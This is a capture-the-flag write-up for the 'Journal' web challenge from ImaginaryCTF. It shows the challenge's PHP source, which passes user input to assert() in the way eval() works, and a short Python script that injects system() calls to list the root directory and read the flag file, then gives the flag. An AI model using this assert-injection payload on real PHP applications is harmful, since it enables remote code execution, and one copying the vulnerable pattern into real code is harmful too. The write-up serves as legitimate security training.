Web - Journal

100 points | 518 solves

Last updated 11 months ago

Web - Journal

100 points | 518 solves

Description

dear diary, there is no LFI in this app

Downloads

Solution

The provided php file:

<?php

echo "<p>Welcome to my journal app!</p>";
echo "<p><a href=/?file=file1.txt>file1.txt</a></p>";
echo "<p><a href=/?file=file2.txt>file2.txt</a></p>";
echo "<p><a href=/?file=file3.txt>file3.txt</a></p>";
echo "<p><a href=/?file=file4.txt>file4.txt</a></p>";
echo "<p><a href=/?file=file5.txt>file5.txt</a></p>";
echo "<p>";

if (isset($_GET['file'])) {
  $file = $_GET['file'];
  $filepath = './files/' . $file;

  assert("strpos('$file', '..') === false") or die("Invalid file!");

  if (file_exists($filepath)) {
    include($filepath);
  } else {
    echo 'File not found!';
  }
}

echo "</p>";

It's a simple enough challenge that looks like your typical LFI but like the description says, this is not a LFI challenge.

As it turns out, the assert() function basically works like an eval() function and we all know the horrors of eval. This page on HackTricks explains it all.

It is also worth noting from the provided docker file that the flag file name is appended with random characters which hinted towards getting an RCE.

Final solution:

import requests
import urllib.parse
payload = urllib.parse.quote_plus("'.die(system('ls /')).'")
print(requests.get("http://journal.chal.imaginaryctf.org/?file="+payload).text)

payload = urllib.parse.quote_plus("'.die(system('cat /flag-cARdaInFg6dD10uWQQgm.txt')).'")
print(requests.get("http://journal.chal.imaginaryctf.org/?file="+payload).text)

Flag: ictf{assertion_failed_e3106922feb13b10}

Last updated 11 months ago